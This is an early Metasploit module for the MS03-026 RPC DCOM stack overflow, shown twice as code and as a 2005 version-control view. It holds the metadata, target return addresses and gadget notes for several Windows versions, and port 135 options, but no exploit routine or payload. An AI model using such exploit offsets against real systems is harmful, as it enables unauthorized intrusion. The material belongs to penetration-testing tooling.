metasploit-framework/modules/exploits/windows/msrpc_dcom_ms03_026.rb

require 'Msf/Core'

module Msf
module Exploits
module Remote

class MSRPC_DCOM_MS03_026 < Msf::RemoteExploit

	def initialize
		super(
			'Name'          => 'Microsoft RPC DCOM MSO3-026',
			'Description'   => 	
				"This module exploits a stack overflow in the RPCSS service, this vulnerability" +
				"was originally found by the Last Stage of Delirium research group and has been" +
				"widely exploited ever since. This module can exploit the English versions of " +
				"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
			'Author'        => [ 'hdm', 'spoonm' ],
			'Version'       => '$Revision$',
			'Refs'          =>
				[
					[ 'OSVDB', '2100'     ],
					[ 'MSB',   'MS03-026' ],
				],
			'Targets'       => 
				[
					# Target 0: Universal
					[ 
						'Windows NT SP3-6a/2000/XP/2003 Universal',
						[ 'winnt', 'win2000', 'winxp', 'win2003' ],
						0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
						0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
						0x77f33723, # Windows NT 4.0 SP6a (esp)
						0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
						0x0018759f, # Windows 2000 Universal (ebx)
						0x01001c59, # Windows XP | XP SP0/SP1 (pop/pop/ret)
						0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)
					]
				],
			'DefaultTarget' => 0,
			'Options'       =>
				[
					Opt::RHOST,
					Opt::RPORT(135)
				])
	end

end

end
end
end
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 04:37:48 +00:00			`require 'Msf/Core'`

			`module Msf`
			`module Exploits`
			`module Remote`

			`class MSRPC_DCOM_MS03_026 < Msf::RemoteExploit`

			`def initialize`
			`super(`
			`'Name' => 'Microsoft RPC DCOM MSO3-026',`
			`'Description' =>`
			`"This module exploits a stack overflow in the RPCSS service, this vulnerability" +`
			`"was originally found by the Last Stage of Delirium research group and has been" +`
			`"widely exploited ever since. This module can exploit the English versions of " +`
			`"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",`
			`'Author' => [ 'hdm', 'spoonm' ],`
			`'Version' => '$Revision$',`
			`'Refs' =>`
			`[`
			`[ 'OSVDB', '2100' ],`
			`[ 'MSB', 'MS03-026' ],`
			`],`
			`'Targets' =>`
			`[`
			`# Target 0: Universal`
			`[`
			`'Windows NT SP3-6a/2000/XP/2003 Universal',`
			`[ 'winnt', 'win2000', 'winxp', 'win2003' ],`
			`0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll`
			`0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll`
			`0x77f33723, # Windows NT 4.0 SP6a (esp)`
			`0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0`
			`0x0018759f, # Windows 2000 Universal (ebx)`
			`0x01001c59, # Windows XP \| XP SP0/SP1 (pop/pop/ret)`
			`0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)`
			`]`
			`],`
			`'DefaultTarget' => 0,`
			`'Options' =>`
			`[`
			`Opt::RHOST,`
			`Opt::RPORT(135)`
			`])`
			`end`

			`end`

			`end`
			`end`
			`end`